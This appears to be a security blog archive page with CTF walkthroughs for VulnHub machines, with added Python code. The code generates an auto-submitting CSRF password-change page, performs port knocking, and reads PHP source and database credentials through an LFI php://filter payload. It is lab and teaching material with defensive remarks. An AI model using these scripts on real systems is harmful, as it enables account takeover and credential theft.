Showing posts from January, 2017

SecOS: 1 Walkthrough

Hi guys, I found another awesome CTF on VulnHub, so let's walk through SecOS: 1.
Nmap:
The nmap result shows two open ports. Let's try to access port 8081.

Looks cool! Let's explore the website, but first open Burp Suite and spider this host so that Burp can capture some directories.

Burp found a page called hint. Let's visit it.
As always it shows nothing on the front end, so let's check the source code.

We got three hints. After reading the third hint I went to the signup option, created an account and logged in with it. Digging around, I noticed three important points:
1. Administrator: Spiderman
2. Change password option
3. Message option
Now the hints make sense: we have to conduct a CSRF attack against the administrator, i.e. Spiderman.
Let's create a form for the CSRF attack. The form should auto-submit, so that as soon as Spiderman visits the page his password is changed.

Save this form to the /var/www directory and start the Apache server. w…
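The auto-submitting form itself is not reproduced on this page. As an added example (not the form from the original post), the following Python script writes such a CSRF proof-of-concept page to the web root. The action URL, the parameter names (password / password_confirm) and the new password are assumptions, since the post does not show them; the real ones come from the change-password request captured in Burp.

```python
"""Generate an auto-submitting CSRF proof-of-concept page.

Added example, not the form from the original post. The action URL, the
parameter names (password / password_confirm) and the new password are
assumptions; take the real ones from the change-password request captured
in Burp.
"""
import html
import sys

# Assumed target, not taken from the SecOS VM.
TARGET_ACTION = "http://192.168.56.101:8081/change-password"
TARGET_FIELDS = {"password": "Hacked123!", "password_confirm": "Hacked123!"}


def build_csrf_poc(action, fields, method="POST"):
    """Return an HTML page whose hidden form submits itself on load.

    Every value is escaped as attribute text, so a password containing
    quotes or angle brackets cannot break out of its input tag.
    """
    if method.upper() not in ("GET", "POST"):
        raise ValueError("method must be GET or POST")
    inputs = "\n".join(
        '    <input type="hidden" name="{}" value="{}">'.format(
            html.escape(name, quote=True), html.escape(str(value), quote=True)
        )
        for name, value in fields.items()
    )
    # The victim's browser attaches his session cookie to this POST, so the
    # server sees a normal password change by the logged-in administrator.
    return (
        "<!DOCTYPE html>\n"
        "<html>\n<body>\n"
        '  <form id="csrf" method="{method}" action="{action}">\n'
        "{inputs}\n"
        "  </form>\n"
        "  <script>document.getElementById('csrf').submit();</script>\n"
        "</body>\n</html>\n"
    ).format(method=method.upper(),
             action=html.escape(action, quote=True),
             inputs=inputs)


def write_poc(path, action=TARGET_ACTION, fields=TARGET_FIELDS):
    """Write the page to path (e.g. /var/www/index.html) and return it."""
    page = build_csrf_poc(action, fields)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(page)
    return page


if __name__ == "__main__":
    out = sys.argv[1] if len(sys.argv) > 1 else "/var/www/index.html"
    write_poc(out)
    print("wrote CSRF PoC to", out)
```

Serve the file from Apache as the post does and get Spiderman to open it, presumably through the message option listed above. The attack only works because the change-password endpoint accepts a request that carries nothing but the session cookie; a per-session anti-CSRF token checked on the server, or SameSite session cookies, would make the forged POST fail.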

Lord of the root CTF walkthrough

Hi guys, today we will walk through the Lord of the Root CTF challenge. You can find this interesting challenge Here. As stated by the author, our goal is to root the box and find the flag.txt file, so let's start ;)
As always, our first task is thorough enumeration, so let's start with nmap to check which services and ports are running on the target machine.

Nmap shows only port 22 open. Let's connect to it and see if we get any hint on how to move further.

It gives us a hint to port knock on ports 1, 2 and 3. There are many ways to port knock, but we will use the following simple shell script.
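The post's shell script is not reproduced on this page. As an added example (not the original script), the following Python helper does the same job: one TCP connection attempt per port, in the given order. The host address is an assumption; the assumption behind the technique is that the knock daemon only needs to see the SYN, so a refused or timed-out connect still counts as a knock.

```python
"""Port-knocking helper.

Added example, not the shell script from the original post. Sends one TCP
connection attempt to each port in the given order. Assumption: the knock
daemon only watches for the incoming SYN, so a refused or timed-out
connect is still a valid knock.
"""
import socket
import sys
import time


def knock(host, ports, delay=0.3, timeout=1.0, dry_run=False):
    """Knock host on ports in order; return the (host, port) sequence sent.

    dry_run=True validates the sequence and returns it without touching
    the network, which is useful for checking the order before sending it.
    """
    sequence = []
    for port in ports:
        port = int(port)
        if not 1 <= port <= 65535:
            raise ValueError("port out of range: %d" % port)
        sequence.append((host, port))
    if dry_run:
        return sequence
    for host_, port in sequence:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(timeout)
        try:
            sock.connect((host_, port))   # the SYN is all the daemon needs
        except OSError:
            pass                          # refused or timed out: still a knock
        finally:
            sock.close()
        time.sleep(delay)                 # keep the knocks clearly ordered
    return sequence


if __name__ == "__main__":
    if len(sys.argv) < 3:
        sys.exit("usage: knock.py <host> <port> [port ...]")
    print("knocked", knock(sys.argv[1], sys.argv[2:]))
```

Run it as `python3 knock.py <target> 1 2 3` and then rescan with nmap, as the post does next. Order matters: a typical knock daemon resets its state on an out-of-sequence port, which is why the script sends the ports strictly one after another with a short pause.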

Let's run this script against our target IP and ports.

After that, let's run nmap again and check for open ports.

As a result of the port knocking we got another open port, i.e. port 1337. Sounds good? Let's access it.

Now let's run nikto to get some juicy information about the target.

Unfortunately nikto shows nothing important. Next I checked the source code for further hi…

Crowdin IDOR Vulnerability


PwnLab CTF Walkthrough

Hi folks, today we will walk through the PwnLab CTF penetration testing challenge. You can find this interesting VM Here. As stated by the author, our goal is to root the box and find the flag.txt file, so let's start ;)

As part of enumeration I fired up nmap to find the services running on the target machine.

I noticed that ports 80 (HTTP) and 3306 (MySQL) are open. Next I decided to run nikto to get some juicy information.

nikto gave me a hint that the config.php file contains a username and password, so now I need to find a way to read config.php. I quickly opened the web application to look for a possible LFI.

Next I tried to inject a simple LFI payload, but nothing happened.

So I decided to look for ways to bypass the LFI protection and found my friend Aaditya's blog with a nice write-up. After that I injected the following payload and got data from config.php:

Next I base64-decoded this data and got the database credentials as shown below.
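Neither the payload nor the decoded output is reproduced on this page. As an added example (not the post's payload and not Aaditya's), the following Python script shows the standard way an LFI hands back base64-encoded PHP source, the php://filter/convert.base64-encode stream wrapper, and how to pull the blob out of the HTML response and decode it. The base URL, the ?page= parameter, the assumption that the include appends ".php", and the sample response with its fake credentials are all constructed for the example.

```python
"""Read PHP source through an LFI with the php://filter wrapper and decode it.

Added example, not the payload from the original post. Assumptions: the
vulnerable parameter is ?page=, the include appends ".php" to its value
(so "config" is requested rather than "config.php"), and the host below.
The php://filter/convert.base64-encode wrapper makes PHP return the file's
source base64-encoded instead of executing it, which is why the result has
to be base64-decoded afterwards.
"""
import base64
import re
import sys
import urllib.parse
import urllib.request

BASE_URL = "http://192.168.56.102/index.php"   # assumption
PARAM = "page"                                 # assumption

# A base64 run long enough not to match ordinary words in the surrounding HTML.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Constructed response for offline use: the page's own HTML with the
# base64 of '<?php $password = "S3cret"; ?>' where the include output goes.
SAMPLE_RESPONSE = (
    "<html><body><p>Welcome</p>"
    "PD9waHAgJHBhc3N3b3JkID0gIlMzY3JldCI7ID8+"
    "</body></html>"
)


def filter_url(base, param, resource):
    """Build the request URL that reads `resource` through php://filter."""
    payload = "php://filter/convert.base64-encode/resource=" + resource
    return base + "?" + urllib.parse.urlencode({param: payload})


def extract_source(body):
    """Return the decoded PHP source embedded in an LFI response.

    Tries the longest base64 runs first and keeps the first one that is
    valid base64 and valid UTF-8, so surrounding HTML or a truncated run
    does not produce garbage.
    """
    for blob in sorted(B64_BLOB.findall(body), key=len, reverse=True):
        try:
            return base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
    raise ValueError("no base64-encoded source found in response")


def fetch_source(resource, base=BASE_URL, param=PARAM):
    """Request `resource` through the LFI and return its decoded source."""
    url = filter_url(base, param, resource)
    with urllib.request.urlopen(url, timeout=10) as resp:
        return extract_source(resp.read().decode("utf-8", "replace"))


def demo():
    """Decode the constructed SAMPLE_RESPONSE without touching the network."""
    return extract_source(SAMPLE_RESPONSE)


if __name__ == "__main__":
    # With no argument, run offline against the constructed sample response.
    print(fetch_source(sys.argv[1]) if len(sys.argv) > 1 else demo())
```

The filter wrapper is what makes this worth base64-decoding: a plain `?page=config` would execute config.php and show nothing, whereas `convert.base64-encode` returns the source verbatim, credentials included. The check on the defensive side is the same one that defeats the simple payload: an include that only accepts values from a fixed allowlist of page names, never a path or a stream wrapper.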